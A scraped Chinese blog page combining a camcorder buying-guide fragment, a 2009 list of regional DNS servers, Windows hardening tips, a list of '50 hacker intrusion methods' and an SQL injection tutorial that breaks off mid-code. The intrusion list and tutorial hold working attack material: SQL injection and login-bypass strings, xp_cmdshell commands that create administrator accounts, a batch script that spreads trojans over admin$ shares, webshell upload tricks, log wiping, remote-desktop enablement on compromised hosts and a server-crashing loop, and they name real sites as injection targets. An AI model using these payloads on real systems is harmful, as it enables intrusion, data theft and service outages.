   因此高倍光学镜头对于DV拍摄效果肯定是有影响的。松下GS11具有24倍光学镜头,佳能MVX系列有的达到22倍。总的来说都是一些低档机型,中档机型 上没有玩得这么出格。换句话说,低档机型只能靠一些所谓的特色来吸引消费者,而中高档DV机型用户更注重拍摄效果。一般家用用户,选择24倍光学变焦也 好,10倍光学变焦也罢。一句话,想要效果就别太看重长焦,想要长焦就比太看重效果。要想折衷,就买个增倍镜好了。自然这也就要添加一些成本了。所以低档 次DV采用大光学变焦也就是看重了这个性价比,因此才有市场。
   相反不少人却对镜头口径并不大看重,其实这也是一个相当重要的性能指标。打个比喻,这就好像水管直径大小和流量的关系,水管口径大流量自然大,而镜头直 径大,光线的通透量也会更多。当然这里面还有个光线的损失率问题。现在数码摄像机的体积越做越小,镜头口径也随之减小了。没有必要去特意追求镜头的口径。 个人建议,在差不多的价位上,尽量选择镜头口径大的机型。

5、3CCD一定就比单CCD机器好? 先看原理,3CCD的数码摄像机内设有三棱镜,此三棱镜把光源分为三原色光(红色、绿色与蓝色),三原色光分别经过三块独立CCD影像感应器处理,颜色的 准确程度及影像质量比使用一块CCD影像感应器大为改善。使CCD影像感应器的每一个都有一个很大的光线采集区域,因此使摄像机具有很高的信杂比,极好的 敏感度以及很宽的动态范围。此外,倍密度的像素分布和无缝的双色棱镜可以获得极为锐利的图像和非常逼真的色彩,即使是在细微的颜色差别处-例如在鲜红色及 更深一点的红色之间能够清楚地分辨出来。3片CCD与单片CCD的图像色彩有区别,3CCD拍摄的影像层次感好,立体感强,但清晰度与采用同样大小的单 CCD片机器是一样的。
谢谢各位访问我的个人博客:http://ytfso.yi.org
我的QQ空间
最新收集全国主要城市电信、网通DNS地址
提供本文未列出DNS地址的朋友,请先Ctrl+F搜索后确实没有再提供...
 
 

最新收集全国主要城市电信、网通DNS地址

2009年7月22日星期三 | | 0 评论 |


  

提供本文未列出DNS地址的朋友,请先Ctrl+F搜索后确实没有再提供,否则可能出现重复现象。
1、增加未列出的DNS地址。
+地区,电信/网通:DNS地址
2、删除失效DNS地址。
-地区,电信/网通:DNS地址
3、修正已列出或不全的DNS地址。
*地区,电信/网通:DNS地址

以下数据来自海蜘蛛DNS地址2.4版。
更新日期2009年5月21日。
————————————————————————————————————————
电信DNS列表  --  按拼音排序
电信  A安徽  202.102.192.68、202.102.199.68
电信  A澳门  202.175.3.8、202.175.3.3
电信  B北京  202.96.199.133、202.96.0.133、202.106.0.20、202.106.148.1
电信  C重庆  61.128.128.68、61.128.192.68
电信  F福建  202.101.115.55、218.85.157.99、218.85.157.99、218.85.152.99
电信  G甘肃  202.100.64.68、61.178.0.93
电信  G广东  202.96.128.86、202.96.134.133、202.96.128.143
电信  G广西  202.103.224.68、202.103.225.68
电信  G贵州  202.98.192.67、202.98.198.167
电信  H杭州  202.101.172.35、202.101.172.46
电信  H海南  202.100.192.68、202.100.199.8
电信  H河北  219.150.32.132  
电信  H黑龙江  219.150.32.132、219.146.0.130、219.147.198.230  
电信  H河南  219.150.150.150、222.88.88.88、222.85.85.85  
电信  H湖北  202.103.0.68、202.103.24.68、202.103.0.117、202.103.44.150
电信  H湖南  202.103.96.112、202.103.96.68、220.170.0.18、61.187.91.18、59.51.78.211、222.245.129.81、61.187.98.3、61.187.98.6
电信  J江苏  61.177.7.1、61.147.37.1、218.2.135.1、221.228.255.1
电信  J江西  202.101.224.68、202.101.226.69
电信  J吉林  219.149.194.55  
电信  L辽宁  219.150.32.132、219.146.0.130
电信  N内蒙古  219.150.32.132、219.146.0.130
电信  N宁夏  202.100.96.68、222.75.152.129
电信  Q青海  202.100.128.68  
电信  S山东  219.146.0.130、219.150.32.132
电信  S上海  202.96.209.5、202.96.209.133、202.96.199.133、202.96.209.5
电信  S陕西  218.30.19.40、61.134.1.4
电信  S四川  61.139.2.69、202.98.96.68、218.6.200.139、61.139.54.66
电信  T台湾  168.95.1.1、168.95.192.1
电信  T天津  202.99.104.68  
电信  X香港  205.252.144.126、218.102.62.71
电信  X新疆  61.128.114.166、61.128.114.133、61.128.99.133、61.128.99.134
电信  Y云南  222.172.200.68、61.166.150.123
电信  Z浙江  60.191.244.5、202.96.113.34、220.189.127.107、60.191.134.206

————————————————————————————————————————
网通DNS列表  --  按拼音排序
网通  A安徽  218.104.78.2  
网通  B北京  202.106.0.20、202.106.196.115
网通  F福建  58.22.96.66、218.104.128.106
网通  G甘肃  221.7.34.10  
网通  G广东  221.4.66.66、210.21.4.130、221.4.8.1  
网通  G广西  202.103.229.40、221.7.128.68
网通  H海南  221.11.132.2  
网通  H河北  202.99.160.68、202.99.166.4
网通  H黑龙江  202.97.224.68、202.97.224.69
网通  H河南  202.102.224.68、202.102.227.68
网通  H湖北  218.104.111.112、218.104.111.114
网通  H湖南  58.20.127.170、58.20.57.4
网通  J江苏  221.6.4.66、221.6.96.177、218.104.32.106  
网通  J江西  220.248.192.12、220.248.192.13
网通  J吉林  202.98.0.68、202.98.5.68
网通  L辽宁  202.96.69.38、202.96.64.68
网通  N内蒙古  202.99.224.8、202.99.224.67、202.99.224.68  
网通  S山东  202.102.152.3、202.102.134.68、202.102.154.3
网通  S上海  210.22.70.3、210.22.84.3、210.52.207.2  
网通  S山西  202.99.192.66、202.99.192.68
网通  S四川  221.10.251.196、119.6.6.6、221.10.251.197
网通  T天津  202.99.96.68、202.99.64.69
网通  Y云南  221.3.131.9、221.3.131.10
网通  Z浙江  221.12.1.228、221.12.33.228、221.12.65.228、218.108.248.200
 
电信  各个地区DNS纠正、增加、删除记录:
*河南,电信:219.150.32.132(syh10000提供20090522)
+杭州,电信:202.101.172.35  202.101.172.46(xiaoqi提供20090524)
-广东,电信:202.96.128.166、202.96.128.68(wgijeee提供20090526)
+山东,网通:202.102.154.3(wdhome提供20090530)
+山东,电信:219.150.32.132(wdhome提供20090530)
+四川,网通:119.6.6.6、221.10.251.197(aki-net提供20090608)
+湖南,电信:59.51.78.211、222.245.129.81(kneey提供20090608)
+广东,电信202.96.128.143(yinzhicheng提供20090628)
+湖南,电信61.187.98.3、61.187.98.6(sky81提供20090628)
+福建,电信:218.85.157.99、218.85.152.99(xplinlong提供20090709)
+福建,网通:58.22.96.66、218.104.128.106(xplinlong提供20090709)
文章来源: 死性不改's Blog~     谢谢各位访问我的空间: http://ytfso.yi.org/
我的QQ空间
Daily: File特性不能以斜杠或反斜杠开始的解决方案
Daily: File特性不能以斜杠或反斜杠开始的解决方案 以前做项目时...
 
 




教你十招让你摆脱来自网络黑客的攻击

2009年7月10日星期五 | | 0 评论 |

现在,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的"IP地址库",要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。

一、取消文件夹隐藏共享

如果你使用了Windows 2000/XP系统,右键单击C盘或者其他盘,选择共享,你会惊奇地发现它已经被设置为"共享该文件夹",而在"网上邻居"中却看不到这些内容,这是怎么回事呢?

原来,在默认状态下,Windows 2000/XP会开启所有分区的隐藏共享,从"控制面板/管理工具/计算机管理"窗口下选择"系统工具/共享文件夹/共享",就可以看到硬盘上的每个分区名后面都加了一个"$"。但是只要键入"计算机名或者IPC$",系统就会询问用户名和密码,遗憾的是,大多数个人用户系统Administrator的密码都为空,入侵者可以轻易看到C盘的内容,这就给网络安全带来了极大的隐患。

怎么来消除默认共享呢?方法很简单,打开注册表编辑器,进入"HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Sevices\Lanmanworkstation\parameters",新建一个名为"AutoShareWKs"的双字节值,并将其值设为"0",然后重新启动电脑,这样共享就取消了。

二、拒绝恶意代码

恶意网页成了宽带的最大威胁之一。以前使用Modem,因为打开网页的速度慢,在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快,所以很容易就被恶意网页攻击。

一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

运行IE浏览器,点击"工具/Internet选项/安全/自定义级别",将安全级别定义为"安全级-高",对"ActiveX控件和插件"中第2、3项设置为"禁用",其它项设置为"提示",之后点击"确定"。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。

三、封死黑客的"后门"

俗话说"无风不起浪",既然黑客能进入,那说明系统一定存在为他们打开的"后门",只要堵死这个后门,让黑客无处下手,便无后顾之忧!

1.删掉不必要的协议

对于服务器和主机来说,一般只安装TCP/IP协议就够了。鼠标右击"网络邻居",选择"属性",再鼠标右击"本地连接",选择"属性",卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源,对于不需要提供文件和打印共享的主机,还可以将绑定在TCP/IP协议的NETBIOS关闭,避免针对NETBIOS的攻击。选择"TCP/IP协议/属性/高级",进入"高级TCP/IP设置"对话框,选择"WINS"标签,勾选"禁用TCP/IP上的NETBIOS"一项,关闭NETBIOS。

2.关闭"文件和打印共享"

文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是黑客入侵的很好的安全漏洞。所以在没有必要"文件和打印共享"的情况下,我们可以将它关闭。用鼠标右击"网络邻居",选择"属性",然后单击"文件和打印共享"按钮,将弹出的"文件和打印共享"对话框中的两个复选框中的钩去掉即可。

虽然"文件和打印共享"关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改"文件和打印共享"。打开注册表编辑器,选择"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesNetWork"主键,在该主键下新建DWORD类型的键值,键值名为"NoFileSharingControl",键值设为"1"表示禁止这项功能,从而达到禁止更改"文件和打印共享"的目的;键值为"0"表示允许这项功能。这样在"网络邻居"的"属性"对话框中"文件和打印共享"就不复存在了。

3.把Guest账号禁用

有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击"用户和密码",单击"高级"选项卡,再单击"高级"按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在"常规"页中选中"账户已停用"。另外,将Administrator账号改名可以防止黑客知道自己的管理员账号,这会在很大程度上保证计算机安全。

4.禁止建立空连接

在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法有以下两种:

方法一是修改注册表:打开注册表"HKEY_LOCAL_MACHINESystemCurrentControlSetControlLSA",将DWORD值"RestrictAnonymous"的键值改为"1"即可。

最后建议大家给自己的系统打上补丁,微软那些没完没了的补丁还是很有用的!

四、隐藏IP地址

黑客经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个"中转站",当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。

五、关闭不必要的端口

黑客在入侵时常常会扫描你的计算机端口,如果安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口,比如,用"Norton Internet Security"关闭用来提供网页服务的80和443端口,其他一些不常用的端口也可关闭。

六、更换管理员帐户

Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator帐号。

首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。

七、杜绝Guest帐户的入侵

Guest帐户即所谓的来宾帐户,它可以访问计算机,但受到限制。不幸的是,Guest也为黑客入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法,所以要杜绝基于Guest帐户的系统入侵。

禁用或彻底删除Guest帐户是最好的办法,但在某些必须使用到Guest帐户的情况下,就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码,然后详细设置Guest帐户对物理路径的访问权限。举例来说,如果你要防止Guest用户可以访问tool文件夹,可以右击该文件夹,在弹出菜单中选择"安全"标签,从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限,比方说只能"列出文件夹目录"和"读取"等,这样就安全多了。

八、安装必要的安全软件

我们还应在电脑中安装并使用必要的防黑软件,杀毒软件和防火墙都是必备的。在上网时打开它们,这样即便有黑客进攻我们的安全也是有保证的。

九、防范木马程序

木马程序会窃取所植入电脑中的有用信息,因此我们也要防止被黑客植入木马程序,常用的办法有:

● 在下载文件时先放到自己新建的文件夹里,再用杀毒软件来检测,起到提前预防的作用。

● 在"开始"→"程序"→"启动"或"开始"→"程序"→"Startup"选项里看是否有不明的运行项目,如果有,删除即可。

● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以"Run"为前缀的可疑程序全部删除即可。

十、不要回陌生人的邮件

有些黑客可能会冒充某些正规网站的名义,然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码,如果按下"确定",你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件,即使他说得再动听再诱人也不上当。

最后还要做好IE的安全设置

ActiveX控件和 Applets有较强的功能,但也存在被人利用的隐患,网页中的恶意代码往往就是利用这些控件编写的小程序,只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择,具体设置步骤是:"工具"→"Internet选项"→"安全"→"自定义级别",建议您将ActiveX控件与相关选项禁用。谨慎些总没有错!

另外,在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过,微软在这里隐藏了"我的电脑"的安全性设定,通过修改注册表把该选项打开,可以使我们在对待ActiveX控件和 Applets时有更多的选择,并对本地电脑安全产生更大的影响。

下面是具体的方法:打开"开始"菜单中的"运行",在弹出的"运行"对话框中输入Regedit.exe,打开注册表编辑器,点击前面的"+"号顺次展开到:HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0,在右边窗口中找到DWORD值"Flags",默认键值为十六进制的21(十进制33),双击"Flags",在弹出的对话框中将它的键值改为"1"即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击"工具→Internet选项→安全"标签,你就会看到多了一个"我的电脑"图标,在这里你可以设定它的安全等级。将它的安全等级设定高些,这样的防范更严密。



我的QQ空间
Daily: File特性不能以斜杠或反斜杠开始的解决方案
Daily: File特性不能以斜杠或反斜杠开始的解决方案 以前做项目时...
 

解析黑客入侵网络常用的50种方法

| | 0 评论 |


网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。

  1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络

  2.搜索栏里输入

  关键字%'and 1=1 and '%'='

  关键字%'and 1=2 and '%'='

  比较不同处 可以作为注入的特征字符

  3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是

  4.我们先到www.google.com底下搜索一下co net mib ver 1.0

  密码帐号都是 'or'='or'

  5.挂马代码

  6.http://www.wyyfk.com/24小时挂qq工具

  7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,

  net localgroup administrators还是可以看出guest是管理员来

  7.只要敢想,新浪也可入侵 注入点

  http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59

  微软官方网站注入点

  http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=

  8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马

  9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器

  sql注入后,如何上传木马,

  文章地址 http://hack123.home4u.china.com/0601.htm

  10.qq强制聊天代码

  http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes

  使用方法:把代码中的红色的"********"星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。

  11. mybbs论坛cookie欺骗 后台备份马

  12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等

  用法: 安装: instsrv.exe 服务名称 路径

  卸载: instsrv.exe 服务名称 remove

  13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陆密码

  14.搜索的技巧 inurl:网址

  15.启航工作室wms 5.0网站程序漏洞

  在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)

  利用动画看http://soft.77169.com/62/20050530/6824.html

  16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以木马不会变~

  17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/

  工具下载www.hack6.com

  地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面

  18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉

  不能注入时要第一时间想到%5c暴库

  19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了

  工具使用方法动画和所有文件

  http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811

  20.缺少xp_cmdshell时

  尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

  假如恢复不成功,可以尝试直接加用户(针对开3389的)

  declare @o int

  exec sp_oacreate 'wscript.shell',@o out

  exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理员
21.批量种植木马.bat

  for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中

  for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间

  扫描地址.txt里每个主机名一行 用\\开头

  22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com

  23.dv7.1用还原数据功能 还原asa木马

  24.凡人网络购物系统v6.0 可以%5c暴库

  25.ipb2.0.2漏洞 构造语句

  $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具 www.hack6.com有下载

  26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间

  27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲

  28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马

  29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路

  30.在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下: 保存为.asp,程序照样 执行.

  31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马

  32.喜欢网页挂马的看看这篇总结文章吧

  http://77169.com/news/hk/2005060611656.html

  33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库

  34.iis6 for windows 2003 enterprise edition 如iis发布目录文件夹包含.asp后辍名.

  将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

  .cer 等后缀的文件夹下都可以运行任何后缀的asp木马

  35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip

  然后用#clear logg和#clear line vty *删除日志

  36.搜索关键字:"copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多

  37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具:bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马

  38.学会总结入侵思路http://www.77169.com/news/hk/2005060811688.html

  39.电脑坏了省去重新安装系统的方法

  纯dos下执行,

  xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config

  2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config

  40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱,因此当我的机子中了此木马后没有立即杀掉进程,而是用内存编辑工具打开它的进程,查找smtp字样,就会找到它的信箱和密码了。只对1.5以前的管用.

  41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的

  http://soft.77169.com/62/20050608/6878.html

  42.有许多管理员用备份的日期做备份数据库的名字

  比如http://www.hack6.com/bbs/databackup/20050601.mdb

  43.动网数据库oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2

  不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面

  http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2

  %cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是"填写登录信息"

  那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名

  44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户
45.解决tcp/ip筛选 在注册表里有三处,分别是:

  hkey_local_machine\system\controlset001\services\tcpip

  hkey_local_machine\system\controlset002\services\tcpip

  hkey_local_machine\system\currentcontrolset\services\tcpip

  分别用

  regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip

  regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip

  regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip

  命令来导出注册表项

  然后把三个文件里的enablesecurityfilters"=dword:00000001,

  改成enablesecurityfilters"=dword:00000000 再将以上三个文件分别用

  regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 导入注册表即可

  46.使chm木马无法在本地运行木马程序 将注册表"hkey_current_u

  ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004项的值由原来十进制的0改为十六进制的3。

  47.开3389的5种方法

  (1)打开记事本,编辑内容如下:

  echo [components] > c:\sql

  echo tsenable = on >> c:\sql

  sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

  编辑好后存为bat文件,上传至肉鸡,执行。

  (2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05

  下载地址:www.netsill.com/rots.zip

  在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

  c:\>cscript rots.vbs <目标ip> <用户名> <密码> [服务端口] [/r]

  如果要对本地使用,ip地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。

  (3)djshao正式版5.0

  解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下,然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡 会自动重启!重启后会出现终端服务

  (4)下载dameware nt utilities 3.66.0.0 注册版

  地址www.netsill.com/dwmrcw36600.zip

  安装注册完毕后输入对方ip用户名密码,等待出现是否安装的对话框点是。

  复制启动后出现对方桌面。

  在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后ok

  (5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可

  48.qq上得到别人的ip

  一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大

  当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复

  还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip

  49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马

  50.让服务器重启

  写个bat死循环:

  @echo off

  :loop1

  cls

  start cmd.exe

  goto loop1

  保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启


我的QQ空间
Daily: File特性不能以斜杠或反斜杠开始的解决方案
Daily: File特性不能以斜杠或反斜杠开始的解决方案 以前做项目时...
 

知识共享:SQL注入原理 高级篇

| | 0 评论 |

  
第一节、利用系统表注入SQLServer数据库

  SQL Server是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子



http://Site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:

  ② http://Site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--

  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。

  ③ http://Site/url.asp?id=1 ;and db_name()>0

  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。

  ④ http://Site/url.asp?id=1;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--

  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\202.96.xx.xx\Share \1.db),但成功率不高。

  ⑤ http://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0

  前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype='U' and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。

  ⑥ http://Site/url.asp?id=1 ;and (Select Top 1 col_name(object_id('表名'),1) from sysobjects)>0

  从⑤拿到表名后,用object_id('表名')获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。

  以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧 第二节、绕过程序限制继续注入

  在入门篇提到,有很多人喜欢用'号测试注入漏洞,所以也有很多人用过滤'号的方法来"防止"注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。

  在"SQL注入的一般步骤"一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在"利用系统表注入SQLServer数据库"中,有些语句包含有'号,我们举个例子

简单的如where xtype='U',字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name='用户',可以用where name=nchar(29992)+nchar(25143)代替。

  第三节、经验小结

  1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。

  2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。

  3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。

  4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。

  5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。

  防范方法

  SQL注入漏洞可谓是"千里之堤,溃于蚁穴",这种漏洞在网上极为普遍,通常是由于程序员对注入不了解,或者程序过滤不严格,或者某个参数忘记检查导致。在这里,我给大家一个函数,代替ASP中的Request函数,可以对一切的SQL注入Say NO,函数如下:



Function SafeRequest(ParaName,ParaType)
 '--- 传入参数 ---
 'ParaName:参数名称-字符型
 'ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)

 Dim ParaValue
 ParaValue=Request(ParaName)
 If ParaType=1 then
  If not isNumeric(ParaValue) then
   Response.write "参数" & ParaName & "必须为数字型!"
   Response.end
  End if
